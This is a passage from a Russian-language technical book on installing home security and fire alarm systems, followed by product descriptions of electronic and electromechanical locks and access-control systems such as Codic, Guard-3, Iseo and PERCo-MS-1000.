Установка сигнализации является не таким простым делом, как это может показаться с первого взгляда. Ведь для этого необходимо знать, как и где установить тот или иной датчик, каким проводом сделать соединения и как его проложить по помещению, как проверить работоспособность датчиков и всей системы в целом. Неправильно установленная система охранно-пожарной сигнализации, какой бы совершенной она ни была, — это своеобразный «кусок железа», не способный решить в полном объеме все поставленные задачи по охране помещения, и впустую потраченные деньги. Лучше всего, если такие системы будут устанавливать специалисты-профессионалы вневедомственной охраны или других охранных структур, дающих гарантию на свою работу.

Если все-таки вы считаете, что в состоянии самостоятельно установить охранную систему, потратьте еще несколько минут и ознакомьтесь с приводимыми ниже рекомендациями по данному вопросу.

Предположим, что система охранно-пожарной сигнализации вами уже выбрана и приобретена в какой-либо торговой организации или фирме. В вашем распоряжении имеется контрольная панель, набор датчиков и исполнительных устройств. Количество необходимого соединительного провода вы должны определить самостоятельно. Для этого нужно определить места установки всех компонентов системы и с помощью рулетки замерить расстояние от контрольной панели до каждого элемента с учетом всех изгибов при прокладке кабеля. Сложив полученные значения вы определите общую длину соединительных проводов. Увеличив эту длину примерно на 10% (для учета непредвиденных затрат кабеля), вы определите то количество провода, которое необходимо приобрести. Наиболее часто при монтаже таких систем используют двухжильный телефонный провод типа ТРП. При его отсутствии можно использовать любой другой низковольтный провод.

Перед установкой сигнализации желательно провести проверку ее работоспособности. Магнитные датчики можно проверить любым тестером, датчики движения имеют встроенную систему контроля.

Монтаж системы следует начать с установки ее «мозга» — контрольной панели. Как правило, системы сигнализации включаются и выключаются поворотом специального ключа или путем набора определенного цифрового кода на контрольной панели (пульте управления). Поэтому контрольная панель должна устанавливаться в легко доступном, но незаметном месте, например под лестницей. Для ее питания и подзарядки аккумуляторов в месте установки контрольной панели необходимо предусмотреть наличие напряжения промышленной сети. Пример размещения контрольной панели (пульта), датчиков, исполнительных устройств и разводки соединительных проводов показан на рис. 1. 3.

1-41.jpg

Рис. 1. 3. Возможный вариант установки системы охранно-пожарной сигнализации:

1 — контрольная панель; 2 — пассивный ИК детектор; 3 — шлейф (фольга); 4 — магнитный датчик; 5 — стробоскоп; 6 — кнопка тревоги; 7 — сирена; 8 — прожектор; 9 — вибродатчик; 10 — фотоэлектрический датчик; 11 — видеокамера; 12 — видеоглазок; 13 — мультиплексор, или квадратор; 14 — монитор; 15 — пожарный извещатель

Магнитные датчики 4 на окна и двери устанавливаются следующим образом. Контакты датчика подключаются к проводу, а сам датчик устанавливается на коробке окна или косяке двери с помощью шурупов. Магнит закрепляется на оконной раме или полотне двери.

Шлейфы из фольги 3 устанавливаются на стеклах неоткрывающихся окон. Нанесение на стекло фольги на клейкой основе требует осторожности и некоторых навыков, т. к. малейшее изменение натяжения фольги толщиной 0, 008—0, 04 мм может привести к ее обрыву и операцию придется повторять заново. Для наклейки фольги нужно на несколько сантиметров снять защитную бумагу, немного натянуть фольгу и плотно прижать к стеклу. Фольгу нужно разгладить кусочком картона. Для изменения направления шлейфа в углах стекла нужно сначала отогнуть фольгу в обратную сторону (клейкой стороной наружу), а затем сделать загиб под углом 45° по отношению к первому.

Для установки клемм, необходимых для подключения фольги к проводному контуру сигнализации, нужно оставить свободные концы фольги длиной около 50 мм. Клеммы приклеиваются на границе стекла и рамы. Концы фольги складываются пополам и накладываются на клеммы, где и закрепляются пластиной и винтом. Для придания фольге особой хрупкости она покрывается специальным лаком. После установки клемм тестером нужно проверить целостность электрической цепи. Пассивный ИК детектор движения 2 устанавливается в углу помещения на высоте около 2 м. Детектор нельзя направлять на батареи отопления, окна и другие участки помещения, где возможен резкий перепад температур. Прибор крепится к стене с помощью специального кронштейна, входящего в комплект поставки или приобретаемого отдельно. Провода подключаются согласно прилагаемой схеме на прибор или систему. Такой детектор требует настройки для установки необходимой зоны охраны.

Кнопка тревоги 6 может быть врезной или накладной и обычно устанавливается в спальне или у входа в помещение в удобном для пользователя месте. Она нужна для того, чтобы вручную включить сирену, если система охраны не сработала по каким-либо причинам.

Сирену 7 можно установить как внутри, так и снаружи помещения. В первом случае она размещается в таком месте, где ее услышит любой, находящийся в доме. Во втором случае сирену нужно закрепить в труднодоступном для правонарушителей месте, например под крышей или на большой высоте. Там же может быть закреплен стробоскоп 5 или прожектор 8. При подключении этих исполнительных устройств нужно обязательно соблюдать полярность.

Скрытая телевизионная камера (видеоглазок) 12 монтируется на полотне входной двери так, чтобы обеспечить максимальный угол обзора околодверного пространства. Выходной зрачок камеры необходимо защитить, например, стеклом толщиной не менее 5 мм.

Телевизионные камеры наблюдения 11 устанавливаются на кронштейнах на высоте, затрудняющей доступ к ним, и в местах, обеспечивающих наилучший обзор охраняемой территории, например на углу здания. Так, при высоте установки ТВ камеры 2, 8 м, она может обеспечить обзор с углами по вертикали до 100° и по горизонтали до 80° на расстоянии до 20 м от камеры. Если необходимо обеспечить больший угол обзора, рекомендуется использовать поворотные устройства, скорость перемещения которых находится в переделах 0—12° в секунду. В этом случае при выбранном среднем расстоянии до объекта, например, 10м можно отслеживать перемещение предметов, движущихся со скоростью не более 2 м/с Мультиплексор (квадратор) 13 устанавливается в помещении рядом с монитором 14.

Охрана периметра, кроме телевизионной системы наблюдения, осуществляется с помощью фотоэлектрических датчиков 10. Эти датчики размещают вдоль ограждения (обычно по углам периметра) с таким расчетом, чтобы нельзя было перелезть или перепрыгнуть через ограждение и не пересечь при этом ИК луч. Защита ограждения от разрушения с целью проникновения на охраняемую территорию осуществляется с помощью вибродатчиков 9. Устанавливаются они согласно инструкции по монтажу.

Извещатели пожарной сигнализации 15, если они необходимы, лучше располагать между спальней и очагами возможного возгорания: гостиной, кухней, столовой. Для дополнительной защиты помещения эти приборы можно разместить и в других помещениях. Пожарные извещатели крепятся вдали от нагревательных приборов, вентиляционных отверстий и флуоресцентных ламп. В большинстве помещений они устанавливаются на потолке на расстоянии не менее 300 мм от стен и осветительных приборов. Настенные извещатели крепятся на расстоянии не менее 150—300 мм от потолка. На потолках с поперечными балками толщиной менее 100 мм они крепятся к основанию одной из них, а не между ними. Пожарные извещатели следует проверять не реже одного раза в месяц.

Прокладка соединительных проводов — это одна из наиболее трудоемких операций. Провода можно прокладывать везде, где это удобно, но не ближе 225 мм от силовых кабелей. Обычно провода прокладываются под плинтусом (или по нему), под ковровым покрытием, под полом и т. д. Двухжильный провод закрепляется специальными скобами или прибивается небольшими гвоздями с интервалом не более 300 мм.

Подключение контрольной панели требует скорее терпения и выдержки, чем специальных навыков. Большое количество проводов может вызвать некоторую растерянность и неуверенность в своих силах, что и приводит, как правило, к ошибкам в подключении. Выполняйте монтаж строго в соответствии с прилагаемой инструкцией и монтажной схемой, а в случае необходимости без стеснения обращайтесь к специалистам.

В следующих главах мы рассмотрим устройства и системы охраны отечественного и зарубежного производства, представленные на российском рынке. Вы познакомитесь с описанием и характеристиками электромеханических и-электронных замков, электронных устройств и систем контроля и ограничения доступа, различных систем охраны и наблюдения, а также извещателей, использующихся в них, систем видеонаблюдения, аудио- и видеодомофонов.

Рис. 1.3. Возможный вариант установки системы охранно-пожарной сигнализации:

Изображение: 

Рис. 1.1. Организация безопасности

Изображение: 

2. Глава 2. ЭЛЕКТРОННЫЕ ЗАМКИ И СИСТЕМЫ ОГРАНИЧЕНИЯ ДОСТУПА.

ГЛАВА 2.ЭЛЕКТРОННЫЕ ЗАМКИ И СИСТЕМЫ ОГРАНИЧЕНИЯ ДОСТУПА.

2.1. Электронные и электромеханические замки.

Электронные и электромеханические замки.

2.1.1. Электронно-механические замки системы Codic.

2. 1. 1. Электронно-механические замки системы Codic

Механика является неотъемлемой, а порой, и важнейшей частью любой охранной системы, которая должна обладать высокой надежностью, иметь современный дизайн и в то же время быть доступной по стоимости. Определяющим фактором при выборе замка должна быть не цена, а степень его защищенности и надежности. Для увеличения степени защиты механические замки объединяются с электронными устройствами набора кода или считывателями магнитных или электронных карточек и ключей. Для открывания двери с таким замком уже не достаточно наличия только ключа. Дверь открывается ключом только в случае правильного набора кода или после идентификации (т. е. определения правильности кода) магнитной или электронной карточки, поднесенной к замку или вставленной в соответствующее гнездо замка. Охранные системы немецкой фирмы Dorma, основанной более 80 лет назад, отвечают всем вышеперечисленным качествам. Они надежно защищают от несанкционированного доступа в помещения посторонних лиц и обеспечивают неприкосновенность и безопасность собственности и людей. Типичным представителем таких охранных систем является электронная система ограничения доступа Codic. Она включает в себя:

> устройства управления открыванием всех типов дверей;

> устройства блокировки аварийных выходов;

> устройства управления открыванием аварийных выходов в случае чрезвычайных ситуаций.

Для обеспечения высокой степени защищенности охраняемых помещений в электронных системах ограничения доступа Codic применяются электронно-

2-1-11.jpg

Рис. 2.1. Электронно-механические замки Codic

механические замки с повышенной секретностью управляющих кодов. Они снабжены устройствами автоматического контроля состояния дверей (открыты/закрыты), а также устройствами автоматического (аварийного) открывания дверей и устройствами оперативного управления замками дверей аварийного выхода в случае, например, пожара.

Система ограничения доступа Codic предлагает максимальную механическую защиту и высокую степень секретности электронного кода для ограничения доступа в дома и квартиры, административные здания и на промышленные предприятия. Эти изделия могут использоваться как индивидуально, так и в составе различных систем ограничения доступа. Внешний вид некоторых электронно-механических замков Codic, обеспечивающих надежную защиту охраняемых помещений, представлен на рис. 2. 1.

Электронно-механические замки используются для обеспечения защиты личной собственности, оборудования, информации от краж и вандализма. Они легко устанавливаются на любые двери.

В замках Codic электронно-механический блок защищен стальной пластиной, предотвращающей его взлом.

Управление электронно-механическим замком осуществляется при помощи вспомогательной клавишной панели — клавиатуры, для этого достаточно набрать определенный код (слово или номер) или вставить специальный ключ, выполненный в виде магнитной или электронной идентификационной карточки в считывающий блок. Считывающий блок (считыватель) производит считывание кода, введенного с карточки, и его идентификацию. Для увеличения безопасности для открывания замка можно совместить оба способа. Микропроцессор, вмонтированный внутрь считывателя, проверяет код и, если он соответствует коду, запрограммированному пользователем, т. е. идентичен, открывает электронно-механический замок. Использование определенной кодовой комбинации может быть изменено пользователем самостоятельно. Для этого достаточно перепрограммировать считыватель. Для повышения защищенности системы предусмотрено автономное питание, независимое от основного. Таким образом, отключение основного питания не нарушит выполнение функций системы и не понизит уровень безопасности. Кроме того, это облегчает установку системы, т. к. отпадет необходимость в прокладке кабеля питания.

Электронная система доступа Codic осуществляет контроль за состоянием запасных выходов и защиту от несанкционированного пользования ими, в тоже время обеспечивая быстрый и безопасный выход из здания в угрожающей ситуации. Благодаря сигнальному устройству, установленному рядом с дверью, любая попытка несанкционированного входа или выхода автоматически вызывает звуковой сигнал тревоги.

Рис. 2.1. Электронно-механические замки Codic

Изображение: 

2.1.2. Электронный кодовый замок Guard-3.

2. 1. 2. Электронный кодовый замок Guard-3

Электронный кодовый замок Guard-3 — это электромеханический замок с микропроцессорным управлением, обеспечивающий высокую степень защиты. Внешний вид замка представлен на рис. 2. 2. Замок обеспечивает надежное механическое запирание любой двери в трех направлениях стальными ригелями, приводимыми в движение встроенным микроэлектродвигателем. Такое запирание двери, при достаточной ее прочности, обеспечивает высокую устойчивость к взлому. Варианты крепления и установки замка на двери представлены на рис. 2. 3.

Надежность электроники обеспечивается исключительными свойствами конверсионных комплектующих элементов и отработанной в течение ряда лет оригинальной электронной схемой. В состав комплекта замка Guard-3 входят пять дистанционных кодовых ключей без источников питания, аналогичных по своему

2-1-21.jpg

2-1-22.jpg

устройству идентификационным карточкам ,описанных выше.Поскольку число возможных комбинаций кода составляет 4.5 млрд.,то подбор кода техническими

средствами практически невозможен.Кроме того ,при попытке подбора

кода срабатывает звуковая сигнализация.

Замок имеет встроенный резервный источник питания и электрозвонок. Все режимы работы замка, а также состояние источников питания индицируются

определенным звуковым сигналом. В системе управления замком предусмотрен

режим перепрограммирования — удаление из памяти замка кода утеренного ключа и ввод нового. На наружной части замка отсутствует традиционное отверстие под ключ (см. рис. 2.2, справа). Имеется возможность подключения к компьютеру для организации автоматической.регистрации всех входящих и выходящих с выдачей протокола в любой момент времени.

Рис. 2.2 Электронный кодовый замок Guard-3

Изображение: 

Рис. 2.3 Варианты крепления и установки замка на двери

Изображение: 

2.1.3. Кодовые замки фирмы Alarm Look.

2.1.3. Кодовые замки фирмы Alarm Look.

Кодовые замки фирмы Alarm Look — это программируемые электронные

цифровые замки с тремя уровнями доступа, с автономным питанием электро-двигателя, предназначенного для управления задвижкой запроного устройства. Эти замки очень удобны для офисов, квартир, общежитий и т.д.

Установка нескольких замков Alarm Look в офисе с успехом заменяет сложную систему ограничения доступа, управляемую с помощью компьютера . Три разных уровня доступа позволяют управлять входом в различные помещения: :

> основной уровень позволяет открывать все замки в помещении и перепрограммировать их;

> служебный уровень позволяет пользоваться только частью помещений.

> пользовательский уровень — позволяет открывать только определенные замки. Замки имеют современный дизайн (рис. 2.4). Специальный замковый механизм позволяет проворачиваться внешней ручке на двери, не открывая замка,

что снижает нагрузку на электропривод типа Flex Drive. Замок открывается при повороте этой ручки только после ввода соответствующего кода. Кроме того, имеется. возможность открывания замка с внешней стороны при помощи ключа. Основные характеристики замков фирмы Alarm Look:

> высоконадежный замковый механизм;

> звуковая индикация о понижении напряжения питания;

> звуковая и световая индикация открывания двери;

> дистанционное управление замком;

^ защита от подбора кода;

> возможность использования в помещении и на улице;

> возможность параллельного открывания обычным ключом;

> программирование кодов доступа и функций системы.

Программирование кодов доступа и функций системы осуществляется при помощи цифровой клавиатуры, которая позволяет создать три уровня доступа:

основной (на все замки офиса) — один код или одна карточка, именуемая мастер-картой; служебный — один основной и 15 пользовательских кодов. Основной уровень позволяет открывать все двери (для всех дверей код общий), а также изменять пользовательские коды. На основном и служебном уровнях можно установить временной доступ длительностью от 5 до 20 с на все или какую-либо конкретную дверь. На этих же уровнях устанавливается код пользователя, действительный только для одноразового прохода, а также индивидуальный или групповой запрет прохода.

Кодовые замки фирмы Alarm Look рассчитаны для установки на двери толщиной от 3, 5 до 5, 5 см, правые или левые, открывающиеся наружу или внутрь, плоские или фигурные. Питание замка осуществляется от 5 алкалиновых батареек, которые обеспечивают 45000 циклов открывания. Цилиндрический замковый

2-1-31.jpg

Рис. 2. 4. Кодовые замки фирмы Alarm Look

механизм выполнен из антикоррозийного материала (закаленный металл холодной прокатки) и совместим с цилиндрическими замками типа Sclage, Arrow, Falcon, Unican/Simplox.

Рис. 2.4. Кодовые замки фирмы Alarm Look

Изображение: 

2.1.4. Электромеханические замки фирмы Iseo.

2.1.4. Электромеханические замки фирмы Iseo

Электромеханические дистанционно управляемые накладные и врезные замки итальянской фирмы Iseo могут устанавливаться на деревянные, пластиковые, стальные, алюминиевые двери различных типов, на решетки, калитки и ворота. Все врезные замки — универсальные, они имеют переворачиваемые ригели и могут устанавливаться на двери любых типов: открывающиеся внутрь или наружу, право- или левосторонние, оснащенные дверными доводчиками.

Электромеханические замки управляются дистанционно, путем подачи напряжения 12 В (15 Вт) постоянного или переменного тока, и могут быть использованы совместно с аудио- и видеодомофонами любых типов, кодовыми панелями, считывателями магнитных карт и электронных ключей, системами радиоуправления с миниатюрными радиобрелками и т. п. Замки применяются для построения «шлюзовых» систем из двух и более дверей, а также в любых других случаях, когда необходимо дистанционно открывать дверь.

Для открывания замка используется встроенный механизм с двухсторонним ключом (DK) или цилиндр. Цилиндры бывают стандартного (ST) и овального (SP) профиля. Все врезные замки имеют взводящий ригель и ригель-защелку, а также ригель-задвижку. Ригель-задвижка может быть выдвижной (в стандартных замках) или поворотной (в узких вертикальных замках). Замок типа 9639-00-90-0 имеет механизм трехточечного запирания (приводы для вертикальных ригелей). Для открывания ригеля-защелки изнутри без подачи напряжения на замок может устанавливаться механическая кнопка или ручка. Конструктивные особенности врезных замков приведены в табл. 2. 1, а внешний вид некоторых из них показан на рис. 2. 5.

Примечание: параметр Е указывает расстояние от края двери до центра цилиндра. Он особенно важен для узких вертикальных замков, которые удобны для алюминиевых, пластиковых и деревянных застекленных дверей.

Таблица 2. 1. Конструктивные особенности врезных замков фирмы Iseo

Тип замка

Е, мм

Тип цилиндра

Тип ригеля-задвижки и количество

Установка ручки

550-60-1

60

SP

Выдвижная, 1

+

791-25-1В

25

ST

Поворотная, 1

-

791-35-1В

35

ST

Поворотная, 1

-

9619-00-90-0

90

DK

Выдвижная, 2

+

9639-00-90-0

90

DK

Выдвижная, 2

+


2-1-41.jpg

Рис. 2. 5. Врезные электромеханические замки и цилиндры фирмы Iseo

Накладные замки фирмы Iseo, представленные на рынке, имеют стальной корпус, покрытый эмалью. На корпусе замка может размещаться внутренний цилиндр или механическая кнопка. При наличии внутреннего цилиндра механическая кнопка может быть заблокирована ключом или зафиксирована в нажатом состоянии (замок открыт).

Таблица 2. 2. Конструктивные особенности накладных замков

Обозначение (тип замка)

Тип

Внутренний

цилиндр

Внутренняя кнопка

двери

наружного цилиндра

511-50-5

1,2

VAR

+

5211-10-50-5

1

VAR

+

5211-20-50-5

2

VAR

+

5111-10-50-5

3

VAR

+

5111-20-50-5

4

VAR

+

5210-10-50-5

1

VAR

+

5210-20-50-5

2

VAR

+

5100-10-50-5

3

FIX

+



Окончание таблицы 2. 2

.Обозначение (тип замка)

Тип

Внутренний цилиндр

Внутренняя кнопка

двери

наружного цилиндра

5100-20-50-5

4

FIX

+

5213-10-50-5

1

VAR

+

+

5213-20-50-5

2

VAR

+

+

5103-10-50-5

3

FIX

+

+

5103-20-50-5

4

FIX

+

+

5214-10-50-5

1

VAR

+

5214-20-50-5

2

VAR

+

5104-10-50-5

3

FIX

+

5104-20-50-5

4

FIX

+


Примечание: параметр «Тип двери» определяется конструкцией двери, для которой предназначен замок (рис. 2. 6).

2-1-42.jpg

Рис. 2. 6. Типы дверей

Наружный цилиндр может иметь фиксированную (FIX) или свободную (VAR) конструкцию. Цилиндр FIX жестко связан с корпусом замка и может устанавливаться на дверь толщиной до 50 мм. Цилиндр VAR связан с замком осью, длина которой может изменяться в больших пределах. Такой цилиндр может быть установлен на дверь толщиной до 85 мм. Конструктивные особенности накладных замков представлены в табл. 2.2, а внешний вид некоторых моделей — на рис. 2.7.

Замки могут комплектоваться цилиндрами повышенной степени секретности. Для управления электрозамками предназначены специальные блоки питания с регулируемым выходным напряжением в диапазоне от 7 до 18 В при токе 1,25 А. Это позволяет управлять замками различного типа на значительном расстоянии, используя при этом провод небольшого сечения. Для выполнения проводки питания к замку между косяком и дверным полотном пред-

2-1-43.jpg

Рис. 2. 7. Накладные электромеханические замки и цилиндры

назначены специальные пружинные контакты типа 050-060(Iseo),металлорукав

типа DLT 103/WH или гибкая теокопроводящая петля .Пружинные контакты ПОЗВОЛЯЮТ ПОЛНОСТЬЮ скрыть подводку питания к замку.

Рис. 2.5. Врезные электромеханические замки и цилиндры фирмы Iseo

Изображение: 

Рис. 2.6. Типы дверей

Изображение: 

Рис. 2.7. Накладные электромеханические замки и цилиндры

Изображение: 

2.2. Электронные системы ограничения доступа.

2.2. Электронные системы ограничения доступа

Надежно запертая и закрытая дверь — основа безопасности. Если это малопосещаемый кабинет, то хороший механический замок избавит вас от проблем. Однако при частом перемещении большого количества людей из одного помещения в другое постоянно приходится пользоваться ключами или запоминать несколько кодов и набирать их на клавиатуре, что чрезвычайно затрудняет поддержание режима безопасности на должном уровне. В таких случаях для обеспечения безопасности необходим автоматизированный контроль доступа. Эта мера позволяет предотвратить воровство, саботаж, промышленный шпионаж, умышленное повреждение имущества и создает барьер для любопытных.

Контроль доступа осуществляется с помощью электронных устройств, называемых системами ограничения доступа. Работа этих систем основана на использовании электронных, магнитных и других идентификационных карточек или ключей и считывателей, обеспечивающих высокий уровень секретности. Для участков, к которым предъявляются повышенные требования безопасности, считыватели дополнительно оснащаются электронными устройствами набора персонального кода. Эти системы позволяют осуществлять охранные функции, разграничение доступа в помещение по времени, регистрацию проходов сотрудников с указанием даты, времени и направления прохода. Предусматривается возможность формирования и контроля базы данных пользователей системы на персональном компьютере.

2. 2. 3. Модуль электронной проходной регистратора комплекса "Менуэт".

2.2.3. Модуль электронной проходной-регистратора комплекса «Менуэт»

Электронная проходная-регистратор предназначена для установки при входе на объект или в местах массового прохода персонала для пропуска его на объект и регистрации.

Устройство представляет собой специализированный контроллер, управление которым осуществляется компьютеризированным комплексом управления доступом "Менуэт".

Электронный регистратор позволяет по идентификационным карточкам автоматически контролировать посещаемость, выявлять опоздавших, не вышедших на работу лиц, производить учет рабочего времени. Этот же регистратор сообщает службе безопасности о лицах, не вышедших из здания по окончании рабочего дня, о нарушителях режима охраны, сохраняет информацию о посещении пользователями помещений.

Регистратор устанавливается на пути массового прохода персонала и выполняет следующие функции:

> разрешение прохода пользователям, имеющим зарегистрированные идентификационные карточки;

> автоматическую регистрацию пользователей с указанием даты, времени, направления прохода;

2-2-31.jpg

Рис. 2.12. Состав системы электронной проходной-регистратора и варианты ее применения

> централизованное разграничение доступа пользователей по спискам, ут вержденным администратором;

> - ведение протоколов несанкционированных действий пользователей с ука занием даты и времени нарушений;

> управление электромеханическим замком или турникетом;

> организация проходов в тамбур-шлюзах.

Состав системы электронной проходной-регистратора и варианты ее применения показаны на рис. 2. 12.

Регистратор может работать в автономном режиме, без компьютера, накапливая данные в своей памяти. При включении компьютера и загрузке программного обеспечения данные из памяти регистратора автоматически считываются в память компьютера для последующей обработки.

При функционировании системы под управлением компьютера информация о проходе персонала передается и обрабатывается в реальном масштабе времени. При этом на экран монитора администратора безопасности выводится информация о проходящем сотруднике.

Регистратор можно использовать в четырех вариантах: в виде двух миниатюрных считывателей; в виде электронного дверного замка; в виде проходной с турникетом или тамбур-шлюза.

Рис. 2.12. Состав системы электронной проходной-регистратора и варианты ее применения

Изображение: 

2. 2. 4. Системы контроля доступа серии PERCo-MS-1000.

2.2.4. Системы контроля доступа серии PERCo-MS-1000

Системы контроля доступа серии PERCo-MS-1000 с использованием пластиковых карточек вместо ключей и пропусков предназначены для решения задач обеспечения безопасности и дисциплины. Системы этой серии являются оптимальным выбором, если задачи рациональной организации труда выходят за рамки простого ограничения доступа и необходимо:

> определить для сотрудников не только помещения, в которые разрешен доступ, но и время, в которое этот доступ можно осуществить;

> иметь информацию о том, что происходит в помещениях или на территории;

> обеспечить выполнение охранных функций.

Системы эффективны при установке на входе в различные учреждения, начиная с оборудования наружной двери небольшого офиса и до оснащения проходной предприятия. Они устанавливаются также на двери кабинетов и других внутренних помещений офисов, банков, учреждений, предприятий.

При оборудовании входных дверей и проходных особого внимания заслуживает то, что, помимо защиты от посторонних, имеется возможность контроля за соблюдением трудовой дисциплины.

При установке на дверях кабинетов и других внутренних помещений, помимо удобства пользования и престижного внешнего вида, большое значение приобретает возможность постановки помещения на охрану с помощью карточки и получение информации о последних событиях (например, кто последним входил в данное помещение, ставил/снимал его с охраны и т. д.).

При оборудовании системами серии 1000 нескольких объектов сотрудники могут проходить на различные объекты, используя одну и ту же карту.

Характеристика систем серии 1000

Любая система серии 1000 имеет возможность подключения к персональному компьютеру (ПК), что упрощает работу с ней и предоставляет пользователю дополнительные возможности. При оснащении нескольких помещений системами серии 1000 можно объединить системы в сеть, подключив их к одному компьютеру (рис. 2. 13).

Следует отметить, что все возможности систем по разграничению доступа и выполнению охранных функций могут быть реализованы и без ПК. Это чрезвычайно удобно в случаях, когда компьютер расположен далеко или не предполагается к использованию в целях контроля доступа.

Кроме того, достоинствами систем серии 1000 являются:

> широкий выбор моделей, различных по цене, что позволяет оптимизировать затраты на оборудование объекта;

> легкость и низкая стоимость монтажа систем;

> простота демонтажа и переустановки систем при переезде или изменении

назначения помещения.

В качестве исполнительных устройств в системах серии PERCo-MS-1000 используются электромеханические замки, турникеты, ворота, шлагбаумы и т. п. При организации линий контроля в качестве исполнительных устройств используются различные датчики.

Для идентификации пользователей используются бесконтактные или магнитные карты доступа.

Системы решают следующие задачи.

1. Разграничение доступа на объект:

> список сотрудников, имеющих право доступа на объект, устанавливается и может быть оперативно изменен ответственным лицом;

> имеется возможность указать, в какое именно время сотруднику разрешено входить в помещение или на территорию предприятия;

> для руководителей, ответственных лиц и охраны может быть разрешен проход в любое время («свободный доступ»);

> все события, в том числе входы/выходы сотрудников, запоминаются системой. Впоследствии эта информация может быть просмотрена, например, с целью контроля за соблюдением дисциплины (кто, когда пришел/ушел и пр.).

2. Охрана.

> в системах имеется специальный режим «Охрана». Ставить с помощью карточек помещение на охрану, снимать его с охраны могут только сотрудники с определенным уровнем доступа. Это позволяет

2-2-41.jpg

Рис. 2.13. Система контроля доступа серии PERCo-MS-1000

> разделить персонал на две (по уровню предоставляемого доступа) иерархические группы;

> в режиме «Охрана» в случае нештатных ситуаций система выдает сигнал тревоги;

> все тревоги, факты постановки/снятия помещения с охраны запоминаются системой и впоследствии могут быть просмотрены. Это позволяет осуществлять контроль в целях обеспечения безопасности.

Выбор модели системы серии PERCo-MS-1000

Система PERCo-MS-1103KD необходима для осуществления полного контроля за доступом в помещения с получением информации о том, кто и когда в него входил и выходил, без использования компьютера.

Контроллер этой модели имеет клавиатуру и дисплей, которые удобно использовать для занесения в систему и последующей корректировки списков сотрудников, имеющих право доступа в помещение, а также для просмотра информации о последних событиях. Системой можно оборудовать одну дверь с контролем входа или входа/выхода либо две двери с контролем входа. Система оснащена встроенными сиреной и аккумулятором. При необходимости ее можно подключить к компьютеру и объединить с другими системами серии 1000.

Применение системы PERCo-MS-1102 со встроенными аккумулятором и сиреной, но без клавиатуры и дисплея, является более дешевым вариантом при тех же функциональных возможностях, если планируется сразу подключить систему к компьютеру или объединить несколько систем в сеть.

PERCo-MS-1101 является еще более оптимальным и дешевым вариантом, если нет опасности пропадания сетевого питания и не нужна встроенная сирена.

PERCo-MS-1203KD с клавиатурой и дисплеем необходима для оборудования проходной с турникетом и организации контроля за перемещением персонала без использования компьютера. Эта универсальная мощная система также позволяет управлять шлагбаумом, воротами и другими исполнительными механизмами. При необходимости ее можно подключить к компьютеру и объединить в сеть с другими системами серии 1000.

Применение модели PERCo-MS-1201 без клавиатуры и дисплея будет более дешевым вариантом, если планируется сразу подключить систему к компьютеру или объединить в сеть с другими системами серии 1000.

Объединение систем серии PERCo-MS-1000

Для обеспечения дополнительного удобства эксплуатации систем контроля доступа серии 1000, их можно объединить в сеть, подключив к одному компьютеру.

Объединение систем предоставляет дополнительные возможности:

> централизованно формировать и редактировать списки сотрудников для каждого объекта;

> централизованно изменять установки систем, например время звучания сирены;

> - централизованно изменять режимы работы объектов, например ставить/снимать помещения с охраны.

Особенно это важно в случае, если на предприятии большое число объектов оборудовано такими системами.

К достоинствам объединения систем серии PERCo-MS-1000 в сеть следует отнести:

> единый принцип работы с системами различных моделей;

> легкость добавления к сети новых систем и увеличения числа контролируемых объектов;

> простое в использовании рускоязычное программное обеспечение.

Все это позволяет создавать и совершенствовать систему управления доступом, отвечающую потребностям конкретной организации.

Рис. 2.13. Система контроля доступа серии PERCo-MS-1000

Изображение: 

2. 2. 5. Электронная система ограничения доступа Magikey.

2.2.5. Электронная система ограничения доступа Magikey

Электронная система ограничения доступа Magikey известной итальянской фирмы Urmet Domus S. p. A. позволяет ограничивать доступ в помещения офиса, предприятия, в жилое помещение. Она позволяет управлять одним и более электромеханическими замками без использования механических ключей. Для открытия дверей используется идентификационный электронный ключ или карточка, которые прикладываются к наружной панели считывателя.

2-2-51.jpg

Рис. 2. 14. Комплект оборудования Magickey, совмещенный с домофонной системой.

2-2-52.jpg

Рис.2.15. Варианты использования системы Magickey

Система состоит из следующих элементов: считывателя, модуля управления, блока питания и электромеханического замка

Устройство Magikey может использоваться совместно с аудио- или видео-домофонной системой ограничения доступа. Модуль управления может работать с четырьмя наружными считывателями и четырьмя замками. В памяти модуля управления хранится до 511 кодов ключей. Комплект оборудования Magickey, совмещенный с домофонной системой, представлен на рис. 2. 14, а варианты

использования системы — на рис. 2. 15.

Фирма-производитель гарантирует качество этого оборудования в соответствии

со стандартом ЕЭС и национальным стандартом Италии, а также соответствие стандартам Российской Федерации.

Рис. 2.14. Комплект оборудования Magickey, совмещенный с домофонной системой.

Изображение: 

Рис.2.15. Варианты использования системы Magickey

Изображение: 

2. 2. 6. Бесконтактные системы ограничения доступа фирмы Impro Technologies.

2.2.6. Бесконтактные системы ограничения доступа фирмы Impro Technologies

Приборы и устройства фирмы Impro Technologies (ЮАР) служат для создания бесконтактных систем ограничения доступа различной сложности. Для автоматического управления исполнительным механизмом (электрозащелкой, электрозамком, турникетом, шлагбаумом и т. п.) в приборах предусмотрен силовой выход на который при приближении к считывателю специального зарегистрированного кодового ключа, выполненного в виде жетона (рис. 2. 16) или пластиковой карточки, подается управляющее напряжение.

Принцип работы считывателя заключается в следующем. Он непрерывно излучает электромагнитные колебания, которые наводят ЭДС в катушке кодового ключа. Благодаря этому обеспечивается питание встроенной в ключ микросхемы, которая, в свою очередь, по определенному закону оказывает воздействие на излучаемое считывателем поле.

Кодовая последовательность, идентифицируемая считывателем, индивидуальна для каждого кодового ключа и имеет одну из 34 млрд. возможных комбинаций, что практически исключает ее подбор. Кодовые комбинации устанавливаются на заводе-изготовителе. Кодовый ключ имеет ударопрочный герметичный корпус с неограниченным сроком службы.

2-2-61.jpg

Рис. 2.16. Внешний вид считывателей и жетонов фирмы Impro Technologies

-Таким образом, если в памяти считывателя хранится код определенного кодового ключа, то при приближении последнего к считывателю код идентифицируется, что дает возможность владельцу этого ключа пройти через соответствующую дверь, проходную и т.п.

Кодовые ключи фирмы Impro Technologies выпускаются двух типов: круглый в виде жетона и в форме кредитной карточки. Они обладают уникальной совместимостью: один и тот же ключ может использоваться для разрешения прохода в помещениях, офисах, квартирах, дачах и т. д., оборудованных различными типами считывателей фирмы Impro Technologies.

С помощью описанной выше технологии можно организовать ограничение доступа не только для людей, но и для транспортных средств. Это достигается с помощью специальных кодовых ключей:

> VTP01RU078 — ключ с кнопкой, предназначенный для открывания ворот, шлагбаумов и т. п.;

> VTP02RU078 — ключ, монтируемый на автомобиле (питание+ 12 В);

